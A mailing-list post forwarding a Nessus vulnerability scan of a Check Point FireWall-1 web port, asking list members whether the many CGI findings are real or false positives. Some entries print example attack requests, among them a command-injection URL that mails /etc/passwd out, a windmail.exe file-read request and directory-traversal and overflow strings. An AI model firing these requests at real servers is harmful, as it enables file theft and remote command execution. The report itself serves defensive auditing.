| |
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FW1] nessus scan of CPFW1 port 900
hi all,
any comments on the validity/accuracy of this report? since we
run solaris and nokia i doubt the *.exe concerns are valid.
i have no insight to the http configuration so it is difficult to
gauge what CP may have done. thanks /pc
------- Forwarded Message
Vulnerability found on port omginitialrefs (900/tcp)
The file /wwwboard/passwd.txt exists.
This file is installed by default with Matt's Script wwwboard
software. This can be a high risk vulnerability if the
password used is the same for other services. An attacker
can easily take over the board by cracking the passwd.
Solution : Configure the wwwadmin.pl script to put
the passwd.txt file somewhere else.
Risk factor : High
CVE : CVE-1999-0953
Vulnerability found on port omginitialrefs (900/tcp)
The 'wrap' CGI is installed. This CGI allows
anyone to get a listing for any directory with mode +755.
** Note that all implementations of 'wrap' are not
vulnerable. See the relevant CVE entry.
Solution : remove it from /cgi-bin.
Risk factor : Low/Medium
CVE : CVE-1999-0149
Vulnerability found on port omginitialrefs (900/tcp)
The 'windmail.exe' cgi is installed.
Some versions of this CGI script have a security flaw that lets
an attacker execute arbitrary commands on the remote server.
To test this, make the following request :
GET /cgi-bin/windmail.exe?-n%20c:\boot.ini%[email protected]
(replace [email protected] by your real email address).
If you receive the content of the file boot.ini,
then you are vulnerable.
Solution : remove it from /cgi-bin. See www.geocel.com
for a new version.
Risk factor : Serious
CVE : CAN-2000-0242
Vulnerability found on port omginitialrefs (900/tcp)
It may be possible for an attacker to reconfigure the
remote web server by requesting :
GET /scripts/wsisa.dll/WService=anything?WSMadmin
Solution : Edit the ubroker.properties file and change
AllowMsngrCmds = 1
to :
AllowMsngrCmds = 0
Risk factor : High
CVE : CAN-2000-0127
Vulnerability found on port omginitialrefs (900/tcp)
The 'websendmail' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : Remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0196
Vulnerability found on port omginitialrefs (900/tcp)
The 'webgais' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : remove it from /cgi-bin
Risk factor : Serious
CVE : CVE-1999-0176
Vulnerability found on port omginitialrefs (900/tcp)
At least one of these file or directories is
world readable :
/webcart/orders/
/webcart/orders/import.txt
/webcart/carts/
/webcart/config/
/webcart/config/clients.txt
/webcart-lite/orders/import.txt
/webcart-lite/config/clients.txt
This misconfiguration may allow an attacker to gather
the credit card numbers of your clients.
Solution : Do not make directories world readable.
Risk factor : High
CVE : CAN-1999-0610
Vulnerability found on port omginitialrefs (900/tcp)
It is possible to fill the hard disk of a server
running OmniHTTPd by issuing the request :
http://omni.server/cgi-bin/visadmin.exe?user=guest
This allows an attacker to crash your web server.
This script checks for the presence of the faulty CGI, but
does not execute it.
Solution : remove visadmin.exe from /cgi-bin.
Risk factor : Medium/High
CVE : CAN-1999-0970
Vulnerability found on port omginitialrefs (900/tcp)
The 'uploader.exe' CGI is installed. This CGI has
a well known security flaw that lets anyone upload arbitrary
CGI on the server, and then execute them.
Solution : remove it from /cgi-win.
Risk factor : Serious
CVE : CVE-1999-0177
Vulnerability found on port omginitialrefs (900/tcp)
The 'upload.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone upload arbitrary
files on the remote web server.
Solution : remove it from /cgi-bin.
Risk factor : Serious
Vulnerability found on port omginitialrefs (900/tcp)
The Cobalt 'siteUserMod' CGI is installed.
Older versions of this CGI allow any user to change the
administrator password.
Make sure you are running the latest version.
Solution :
RaQ 1 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ1-Security-3.6.pkg
RaQ 2 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ2-Security-2.94.pkg
RaQ 3 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ3-Security-2.2.pkg
Risk factor : High
CVE : CAN-2000-0117
Vulnerability found on port omginitialrefs (900/tcp)
The remote web server has one of these shells installed
in /cgi-bin :
ash, bash, csh, ksh, sh, tcsh, zsh
Leaving executable shells in the cgi-bin directory of
a web server may allow an attacker to execute arbitrary
commands on the target machine with the privileges of the
http daemon (usually root or nobody).
Solution : Remove all the shells from /cgi-bin.
Risk factor : Serious
CVE : CAN-1999-0509
Vulnerability found on port omginitialrefs (900/tcp)
At least one of these CGI scripts is installed :
hello.bat
echo.bat
They allow any attacker to execute commands
with the privileges of the web server process.
Solution : Delete all the *.bat files from your cgi-bin/
directory
Risk factor : High
CVE : CAN-2000-0213
Vulnerability found on port omginitialrefs (900/tcp)
The 'plusmail' CGI is installed. Some
versions of this CGI have a well known security flaw that
lets an attacker execute arbitrary
commands with the privileges of the http daemon
(usually root or nobody).
Solution : remove it from /cgi-bin. No patch yet
Risk factor : Serious
CVE : CAN-2000-0074
Vulnerability found on port omginitialrefs (900/tcp)
The 'Perl' CGI is installed and can be launched
as a CGI. This is equivalent to giving a free shell to an attacker, with the
http server privileges (usually root or nobody).
Solution : remove it from /cgi-bin
Risk factor : Serious
CVE : CAN-1999-0509
Vulnerability found on port omginitialrefs (900/tcp)
The 'nph-publish.cgi' is installed. This CGI has
a well known security flaw that lets an attacker to execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
Vulnerability found on port omginitialrefs (900/tcp)
The CGI /scripts/tools/newdsn.exe is present.
This CGI allows any attacker to create files
anywhere on your system if your NTFS permissions
are not tight enough, and can be used to overwrite
DSNs of existing dabases.
Solution : Remove newdsn.exe
Risk factor : High
CVE : CVE-1999-0191
Vulnerability found on port omginitialrefs (900/tcp)
The file /admin-serv/config/admpw is readable.
This file contains the encrypted password for the Netscape
administration server. Although it is encrypted, an attacker
may attempt to crack it by brute force.
Solution : Remove read access permissions for this file and/or stop
the netscape admininistration server.
Risk factor : Medium
Vulnerability found on port omginitialrefs (900/tcp)
The file /ncl_items.html exists on the remote system.
It is very likely that this file will allow an attacker
to reconfigure your Tektronix printer.
An attacker can use this to prevent the users of your
network from working properly by preventing them
from printing their files.
Solution : Filter incoming traffic to port 80 to this
device, or disable the Phaserlink webserver on the
printer (can be done by requesting http://printername/ncl_items?SUBJECT=2097)
Risk factor : Low
Vulnerability found on port omginitialrefs (900/tcp)
It is possible to read
any file on the remote system by prepending
several dots before the file name.
Example :
GET ........../config.sys
Solution : Disable this service and install
a real Web Server.
Risk factor : High
CVE : CVE-1999-0386
Vulnerability found on port omginitialrefs (900/tcp)
The web server is probably susceptible to a common IIS vulnerability discovered by
'Rain Forest Puppy'. This vulnerability enables an attacker to execute arbitrary
commands on the server with Administrator Privileges.
See Microsoft security bulletin (MS99-025) for patch information.
Also, BUGTRAQ ID 529 on www.securityfocus.com (http://www.securityfocus.com/bid/529
Risk factor : High
CVE : CVE-1999-1011
Vulnerability found on port omginitialrefs (900/tcp)
The 'jj' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : Remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0260
Vulnerability found on port omginitialrefs (900/tcp)
The 'info2www' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Example:
http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'
Solution : Remove it from /cgi-bin or upgrade.
Risk factor : Serious
CVE : CVE-1999-0266
Vulnerability found on port omginitialrefs (900/tcp)
The use of /iisadmin is not limited to the loopback address.
Anyone can use it to reconfigure your web server.
Solution : Restrict access to /iisadmin through the IIS ISM
Risk factor : High
Vulnerability found on port omginitialrefs (900/tcp)
Several versions of the 'icat' CGI allow a remote
user to read arbitrary file on the target system. Make sure you
are running the latest version of icat.
Risk factor : Medium/High.
Solution : Upgrade to the latest version of icat
Vulnerability found on port omginitialrefs (900/tcp)
The 'handler' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0148
Vulnerability found on port omginitialrefs (900/tcp)
The 'guestbook.pl' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0237
Vulnerability found on port omginitialrefs (900/tcp)
The 'guestbook.cgi' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0237
Vulnerability found on port omginitialrefs (900/tcp)
The 'glimpse' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Note that we could not actually check for the presence
of this vulnerability, so you may be using a patched
version.
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0147
Vulnerability found on port omginitialrefs (900/tcp)
The remote web server appears to be running with
Frontpage extensions and lets the file 'authors.pwd'
to be downloaded by everyone.
This is a security concern since this file contains
sensitive data.
Solution : Contact Microsoft for a fix.
Risk factor : Medium
CVE : CVE-1999-0386
Vulnerability found on port omginitialrefs (900/tcp)
At least one of these CGI is installed :
loadpage.cgi
search.cgi
If they come from the package EZShopper 3.0, they
may be vulnerable to some security flaws that can
allow an intruder to view arbitrary files and/or
to execute arbitrary commands with the priviledges of
the web server.
Solution : Make sure that you are running the latest
version of EZShopper,
available at http://www.ahg.com/software.htm#ezshopper
Risk factor : High
CVE : CAN-2000-0187
Vulnerability found on port omginitialrefs (900/tcp)
The Excite for Webservers is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Version 1.1 and newer are patched.
Solution : if you are running a version older than 1.1, then
upgrade it.
Risk factor : Serious
CVE : CVE-1999-0279
Vulnerability found on port omginitialrefs (900/tcp)
ServletExec has a servlet called 'UploadServlet' in its server
side classes. UploadServlet, when invokable, allows an
attacker to upload any file to any directory on the server. The
uploaded file may have code that can later be executed on the
server, leading to remote command execution.
Solution : Remove it
Risk Factor: Serious
CVE : CAN-2000-1024
Vulnerability found on port omginitialrefs (900/tcp)
'dfire.cgi' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CAN-1999-0913
Vulnerability found on port omginitialrefs (900/tcp)
The script /cart/cart.cgi is present.
If this shopping cart system is the Dansie
Shopping Cart, then it is very likely that it
contains a backdoor which allows anyone to
execute arbitary commands on this system.
Solution : use another cart system
Risk factor : High
CVE : CAN-2000-0252
Vulnerability found on port omginitialrefs (900/tcp)
The 'Count.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0021
Vulnerability found on port omginitialrefs (900/tcp)
'cgiwrap' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
** Note that all version of cgiwrap are not affected
by this problem ! Consult your vendor.
Solution : remove it from /cgi-bin.
Risk factor : Serious
Vulnerability found on port omginitialrefs (900/tcp)
The 'campas' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0146
Vulnerability found on port omginitialrefs (900/tcp)
RedHat Linux 6.0 installs by default a squid cache manager cgi script with
no restricted access permissions. This script could be used to perform a
port scan from the cgi-host machine.
Solution :
If you are not using the box as a Squid www proxy/cache server then
uninstall the package by executing:
/etc/rc.d/init.d/squid stop
rpm -e squid
If you want to continue using the Squid proxy server software, make the
following actions to tighten security access to the manager interface:
mkdir /home/httpd/protected-cgi-bin
mv /home/httpd/cgi-bin/cachemgr.cgi /home/httpd/protected-cgi-bin/
And add the following directives to /etc/httpd/conf/access.conf and
srm.conf:
--- start access.conf segment ---
# Protected cgi-bin directory for programs that
# should not have public access
order deny,allow
deny from all
allow from localhost
#allow from .your_domain.com
AllowOverride None
Options ExecCGI
--- end access.conf segment ---
--- start srm.conf segment ---
ScriptAlias /protected-cgi-bin/ /home/httpd/protected-cgi-bin/
--- end srm.conf segment ---
Risk Factor: High
CVE : CVE-1999-0710
Vulnerability found on port omginitialrefs (900/tcp)
The Cart32 e-commerce shopping cart is installed.
This software contains several security flaws :
- it may contain a backdoor
- users may be able to change the admin password remotely
You should use something else.
See also : http://www.cerberus-infosec.co.uk/advcart32.html
Solution : use another shopping cart software
Risk factor : High
CVE : CAN-2000-0429
Vulnerability found on port omginitialrefs (900/tcp)
BizDB is a web databse integration product
using perl CGI scripts. One of the scripts,
bizdb-search.cgi, passes a variable's
contents to an unchecked open() call and
can therefore be made to execute commands
at the privilege level of the webserver.
The variable is dbname, and if passed a
semicolon followed by shell commands they
will be executed. This cannot be exploited
from a browser, as the software checks for
a referrer field in the HTTP request. A
valid referrer field can however be created
and sent programmatically or via a network
utility like netcat.
see also : http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm
Risk factor : Serious
CVE : CAN-2000-0287
Vulnerability found on port omginitialrefs (900/tcp)
The 'bboard' servlet is installed in
/servlet/sunexamples.BBoardServlet. This servlet has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it.
Risk factor : Serious
CVE : CVE-2000-0629
Vulnerability found on port omginitialrefs (900/tcp)
It is possible to access the remote host AxisStorpoint
configuration by requesting :
http://server/cd/../config/html/cnf_gi.htm
Solution : upgrade to the latest version available at
http://www.se.axis.com/techsup/cdsrv/storpoint_cd/index.html
Risk factor : Serious
CVE : CAN-2000-0191
Vulnerability found on port omginitialrefs (900/tcp)
The file /site/eg/source.asp is present.
This file comes with the Apache::ASP package
and allows anyone to write to files in the
same directory.
An attacker may use this flaw to upload his
own scripts and execute arbitrary commands
on this host.
Solution : Upgrade to Apache::ASP 1.95
Risk factor : Serious
CVE : CAN-2000-0628
Vulnerability found on port omginitialrefs (900/tcp)
The 'get32.exe' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
Vulnerability found on port omginitialrefs (900/tcp)
IIS comes with the sample site 'ExAir'.
Unfortunately, one of its pages,
namely /iissamples/exair/search/search.asp,
may be used to make IIS hang, thus preventing
it from answering to legitimate clients.
Solution : Delete the 'ExAir' sample IIS site
Risk factor : Medium
CVE : CVE-1999-0449
Vulnerability found on port omginitialrefs (900/tcp)
IIS comes with the sample site 'ExAir'. Unfortunately, one of its pages,
namely /iissamples/exair/search/query.asp, may be used to make IIS hang,
thus preventing it from answering to legitimate clients.
Solution : Delete the 'ExAir' sample IIS site
Risk factor : Medium.
CVE : CVE-1999-0449
Vulnerability found on port omginitialrefs (900/tcp)
IIS comes with the sample site 'ExAir'. Unfortunately,
one of its pages, namely /iissamples/exair/search/advsearch.asp, may
be used to make II hang, thus preventing it from answering to legitimate
clients.
Risk factor : Medium/High.
Solution : Delete the 'ExAir' sample IIS site
CVE : CVE-1999-0449
Vulnerability found on port omginitialrefs (900/tcp)
The CGI /scripts/tools/mkilog.exe is present.
This CGI allows an attacker to view and modify SQL database
contents.
Solution : Remove it
Risk factor : Serious
Vulnerability found on port omginitialrefs (900/tcp)
Some Web Servers use a file called /robot(s).txt to make search engines and
any other indexing tools visit their WebPages more frequently and
more efficiently.
By connecting to the server and requesting the /robot(s).txt file, an
attacker may gain additional information about the system they are
attacking.
Such information as, restricted directories, hidden directories, cgi script
directories and etc. Take special care not to tell the robots not to index
sensitive directories, since this tells attackers exactly which of your
directories are sensitive.
Risk factor : Medium
Vulnerability found on port omginitialrefs (900/tcp)
The Sambar webserver is running
and the 'mailit.pl' cgi is installed. This CGI takes
a POST request from any host and sends a mail to a supplied address.
See http://www.toppoint.de/~hscholz/sambar for more information.
Solution : remove it from /cgi-bin.
Risk factor : Serious
Vulnerability found on port omginitialrefs (900/tcp)
The mini-sql program comes with the
w3-msql CGI which is vulnerable to a buffer overflow.
An attacker may use it to gain a shell on this system.
Solution : contact the vendor of mini-sql (http://hugues.com.au)
and ask for a patch. Meanwhile, remove w3-msql from
/cgi-bin
Risk factor : High
CVE : CAN-2000-0012
Vulnerability found on port omginitialrefs (900/tcp)
There is a buffer overrun in
the 'php.cgi' CGI program, which will allow anyone to
execute arbitrary commands with the same privileges as the
web server (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0058
Vulnerability found on port omginitialrefs (900/tcp)
It was possible to overflow a buffer in a CGI
on the remote server by making the request :
GET /ss?setsite=aaaa[....]aaaa
An attacker may use this flaw to execute arbitrary
code on this server.
Solution : There is no fix at this time.
Workaround : see http://w1.855.telia.com/~u85513179/index.html.
Risk factor : High
CVE : CVE-1999-0931
Vulnerability found on port omginitialrefs (900/tcp)
The 'imagemap.exe' cgi is installed. This CGI
is vulnerable to a buffer overflow that will allow a remote user
to execute arbitrary commands with the privileges of your httpd
server (either nobody or root).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0951
Vulnerability found on port omginitialrefs (900/tcp)
It was possible to perform
a denial of service against the remote
HTTP server by sending it a long /cgi-bin relative URL.
This problem allows a cracker to prevent
your Lotus Domino web server from handling requests.
Solution : contact your vendor for a patch, or
change your server. Consider changing cgi-bin mapping
by something impossible to guess in server document of
primary Notes NAB.
Risk factor : Serious
CVE : CVE-2000-0023
Warning found on port omginitialrefs (900/tcp)
a web server is running on this port
Warning found on port omginitialrefs (900/tcp)
The 'mailnews' cgi is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
Warning found on port omginitialrefs (900/tcp)
The 'webdriver' cgi is installed. This CGI usually
lets anyone access the Informix databases of the hosts that run it.
** Warning : Nessus only tested the presence of this CGI, it did not
** determine if you specific version is vulnerable to that problem
Solution : remove it from /cgi-bin.
Risk factor : Serious
Warning found on port omginitialrefs (900/tcp)
The 'test-cgi' cgi is installed. This CGI has
a well known security flaw that lets an attacker read arbitrary
files with the privileges of the http daemon (usually root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0070
Warning found on port omginitialrefs (900/tcp)
The 'printenv' CGI is installed.
printenv normally returns all environment variables.
This gives an attacker valuable information about the
configuration of your web server, allowing them to focus their
attacks.
Solution : Remove it from /cgi-bin.
Risk factor : Medium
Warning found on port omginitialrefs (900/tcp)
The CGI script ppdscgi.exe, part of the PowerPlay
Web Edition package, is installed.
Due to design problems as well as some
potential web server misconfiguration
PowerPlay Web Edition may serve up data
cubes in a non-secure manner. Execution
of the PowerPlay CGI pulls cube data into
files in an unprotected temporary directory.
Those files are then fed back to frames in
the browser. In some cases it is trivial for an
unauthenticated user to tap into those data
files before they are purged.
Solution : Cognos doesn't consider this
problem as being an issue, so they
do not provide any solution.
Risk factor : Medium
Warning found on port omginitialrefs (900/tcp)
The 'pagelog.cgi' cgi is installed. This CGI has
a well known security flaw that lets an attacker create arbitrary
files on the remote server, ending in .txt, and reading arbitrary
files ending in .txt or .log
*** Warning : this flaw was not tested by Nessus. Check the existence
of /tmp/nessus_pagelog_cgi.txt on this host to find out if you
are vulnerable or not.
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CAN-2000-0940
Warning found on port omginitialrefs (900/tcp)
The 'nph-test-cgi' CGI is installed. This CGI has
a well known security flaw that lets an attacker get a listing
of the /cgi-bin directory, thus discovering which CGIs are installed
on the remote host.
Solution : remove it from /cgi-bin.
Risk factor : Serious
Warning found on port omginitialrefs (900/tcp)
The 'finger' cgi is installed. It is usually
not a good idea to have such a service installed, since
it usually gives more troubles than anything else.
Double check that you really want to have this
service installed.
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CAN-1999-0197
Warning found on port omginitialrefs (900/tcp)
The 'dumpenv' cgi is installed. This
CGI gives away too much information about the web server
configuration, which will help a cracker.
Solution : remove it from /cgi-bin.
Risk factor : Low
Warning found on port omginitialrefs (900/tcp)
robot.txt contains the following:
<html><head>
<title>
Authentication Form
</title>
</head>
<p>
<BODY BGCOLOR="#000000" TEXT="#00FF00">
<FORM METHOD="POST" ACTION="http://172.20.160.1:900";>
<h3 align=left><font face="arial,helvetica">Client Authentication Remote
Service</font></h3>
<INPUT TYPE="hidden" NAME="ID" VALUE="3ad490e1023f"> <P>
<INPUT TYPE="hidden" NAME="STATE" VALUE="1"><P>
FireWall-1 message: User: <p> <P>
Login : <INPUT NAME="DATA"> <P>
press submit when done: <INPUT TYPE="submit"
VALUE="Submit">. <P>
</FORM>
<p> <P>
</BODY>
</html>
Warning found on port omginitialrefs (900/tcp)
The rpm_query CGI is installed.
This CGI allows anyone who can connect to this
web server to obtain the list of the installed
RPMs.
This allows attacker to determine the version
number of your installed services, hence making
their attacks more accurate.
Solution : remove this CGI from cgi-bin/
Risk factor : Low
CVE : CVE-2000-0192
Information found on port omginitialrefs (900/tcp)
The remote web server does not respect the HTTP protocol in that
it does not send 404 error codes when a client requests a non-existent
page.
You are very likely to get false positives for the web checks.
Warning found on port general/tcp
The remote host uses non-random IP IDs, that is, it is
possible to predict the next value of the ip_id field of
the ip packets sent by this host.
An attacker may use this feature to determine if the remote
host sent a packet in reply to another request. This may be
used for portscanning and other things.
Solution : Contact your vendor for a patch
Risk factor : Low
Information found on port general/tcp
Nmap found that this host is running Solaris 2.6 - 2.7
Vulnerability found on port unknown (900/tcp)
It was possible to make IIS use 100% of the CPU by
sending it malformed extension data in the URL
requested, preventing him to serve web pages
to legitimate clients.
Solution : Microsoft has made patches available at :
- For Internet Information Server 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906
- For Internet Information Server 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904
Risk factor : Serious
CVE : CVE-2000-0408
------- End of Forwarded Message
================================================================================
To unsubscribe from this mailing list, please see the instructions at
http://www.checkpoint.com/services/mailing.html
================================================================================
|
|
